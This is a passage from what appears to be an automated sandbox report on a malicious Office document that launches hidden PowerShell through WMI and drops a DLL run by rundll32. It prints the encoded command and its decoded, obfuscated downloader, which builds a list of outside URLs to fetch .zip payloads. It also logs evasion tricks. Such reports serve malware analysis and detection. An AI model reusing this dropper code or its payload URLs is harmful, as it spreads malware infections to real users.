ACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001B50 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,
Source: I11F.dll.5.drStatic PE information: section name: .2
Source: I11F.dll.5.drStatic PE information: section name: .rdata2
Source: I11F.dll.5.drStatic PE information: section name: .text5
Source: I11F.dll.5.drStatic PE information: section name: .text4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0093A012 push ebp; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00938596 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0093B1CC push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001B50 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F810 pushfd ; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C856 push ebp; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001C70 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D8F3 pushad ; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001BD9B push esp; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B265 push 588A19FDh; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001FA73 push edx; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000EEBF push eax; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000EEFA push 00000000h; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10022EFF push eax; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B304 push 588A1BCDh; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F307 push esp; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000BF15 push 0000002Dh; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CB23 push eax; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001FB27 push eax; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000CFC7 pushad ; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10022FEB push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F7FB pushfd ; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029BFB0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00267172 push dword ptr [ebp+ecx*8-49h]; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002862CD pushad ; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0027F6CD push esi; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026899D push 00000369h; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002689CD push 00000369h; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0028FB74 push esi; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00261D11 push FFFFFFD5h; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00260E8F push esi; ret

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Lx8o0sz\Gztazkl\I11F.dllJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001CE0 EntryPoint,GetTextCharacterExtra,CreateSolidBrush,IsCharAlphaW,GetOpenClipboardWindow,GetProcessWindowStation,IsWindowUnicode,LoadCursorW,DeleteObject,IsGUIThread,GetFontLanguageInfo,GetSystemPaletteUse,GetWindowTextLengthA,DeleteDC,GetClipboardOwner,DeleteEnhMetaFile,GetMenu,IsCharLowerW,DeleteMetaFile,GetMenuItemCount,ShowCaret,WindowFromDC,CharUpperA,CreateMetaFileW,IsCharAlphaNumericA,GetTextColor,CreateCompatibleDC,GetParent,GetSystemPaletteUse,FlattenPath,EndPath,GdiFlush,DestroyIcon,GdiGetBatchLimit,GetEnhMetaFileW,GetDCBrushColor,CreateMetaFileA,GdiGetBatchLimit,GetDoubleClickTime,GetCapture,GetWindowTextLengthA,ReleaseCapture,GetSystemMetrics,GetKBCodePage,GetEnhMetaFileA,IsMenu,LoadCursorFromFileW,CloseWindowStation,AddFontResourceW,IsMenu,GetShellWindow,GetKeyboardType,IsCharAlphaNumericA,GetSystemMetrics,GetMapMode,SaveDC,GdiFlush,FillPath,CreatePatternBrush,CharUpperW,AbortPath,CreateSolidBrush,GetCaretBlinkTime,AnyPopup,GetMessagePos,GetMessageExtraInfo,GetOpenClipboardWindow,PaintDesktop,CharLowerW,GetDlgCtrlID,GetMenuCheckMarkDimensions,CharLowerW,GetInputState,GetColorSpace,VkKeyScanW,BeginPath,CreateMetaFileA,IsGUIThread,DrawMenuBar,EnumClipboardFormats,GetLayout,ReleaseCapture,CharUpperA,CancelDC,LoadCursorFromFileA,DestroyIcon,DeleteEnhMetaFile,GetClipboardSequenceNumber,WindowFromDC,GetCursor,GetPixelFormat,GetWindowTextLengthW,GetDialogBaseUnits,IsIconic,DestroyWindow,OemKeyScan,GetMapMode,GetInputState,IsCharAlphaNumericA,DestroyMenu,GetDoubleClickTime,GdiFlush,GetKeyboardLayout,IsCharAlphaNumericA,CharUpperA,CharUpperW,GetDCPenColor,DeleteMetaFile,GetClipboardSequenceNumber,SwapBuffers,CreateMetaFileW,IsCharLowerA,GetTextAlign,DestroyMenu,DrawMenuBar,GetFontLanguageInfo,SwapBuffers,IsWindowUnicode,AnyPopup,EndMenu,WidenPath,RealizePalette,GetLastError,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002788DD rdtsc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1100Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: powershell.exe, 00000005.00000002.2089530834.0000000000214000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002788DD rdtsc
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001B50 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029B5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029B6E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00917A60 RtlAddVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded SeT-itEm vaRIaBlE:w2HC ([tyPE]("{0}{2}{3}{1}" -f'sySt','rECtoRy','eM.io.','Di') ) ; sEt-item ("VAria"+"ble:"+"s"+"9n6") ( [type]("{4}{0}{7}{5}{8}{3}{6}{2}{1}"-f 'sTEm.n','ER','nag','ic','Sy','.','EPoiNtma','ET','Serv') ); $Rze8ms1=$L_7F + [char](64) + $Z40J;$U51B=(('I'+'86')+'Y'); $w2hC::"crEat`eDi`RectO`Ry"($HOME + (('Fp'+('fL'+'x8')+('o'+'0s'+'zFp')+('fGzta'+'zk')+('lF'+'p')+'f')-rEplaCE ('F'+'pf'),[ChAr]92));$Q81B=('X'+('4'+'_V')); $S9N6::"sEcur`i`TYpRo`TOcOL" = ('T'+('l'+'s12'));$P55L=(('I'+'_6')+'F');$Olvvwn6 = (('I'+'11')+'F');$I82O=('I'+('34'+'R'));$Uo7olue=$HOME+((('cH'+'q')+('Lx8'+'o'+'0s')+('zcH'+'q')+('Gzt'+'az')+('k'+'lcHq')) -ReplACE ([CHaR]99+[CHaR]72+[CHaR]113),[CHaR]92)+$Olvvwn6+('.d'+'ll');$S_6P=('R'+('51'+'N'));$Gt0es1u=(('A]'+'['+'q[D')+':/'+('/m'+'ai')+('l.'+'k')+'yo'+'j'+'in'+('c'+'ond')+'ui'+'t'+'s.'+('com/j'+'hgu'+'n')+('75'+'3')+('.zip@A]['+'q[D'+'://')+'a'+('ccur'+'at'+'ebc')+('.gr'+'/e0lw'+'3t.z'+'i')+('p@'+'A]')+'[q'+('[D'+':')+('//tu'+'mk')+('uv.o'+'r')+('g.tr/'+'z'+'d8')+'dx'+('b2u'+'.zi'+'p')+'@'+('A'+'][')+'q['+'D:'+'//'+'t'+'he'+('w'+'orldofjac'+'o'+'b.')+'c'+'om'+('/cjs'+'o')+('mlo'+'.zip@')+('A'+'][q')+'['+('D:/'+'/')+'e-'+('maco'+'m')+'.'+('c'+'om.')+('b'+'r/cl3')+'5'+('e0.zip'+'@A'+'][')+'q['+('D'+':/')+'/l'+('eg'+'i'+'on.s'+'er'+'iesn')+'ow'+('.we'+'b')+('sit'+'e')+'/q'+('3'+'3rv')+'2'+('.zi'+'p'))."re`pl`ACE"((('A]'+'[')+'q'+'[D'),([array](('d'+('s'+'ewf')),('w'+('evw'+'e'))),('ae'+'ff'),(('ht'+'t')+'p'))[2])."SPl`it"($K17P +
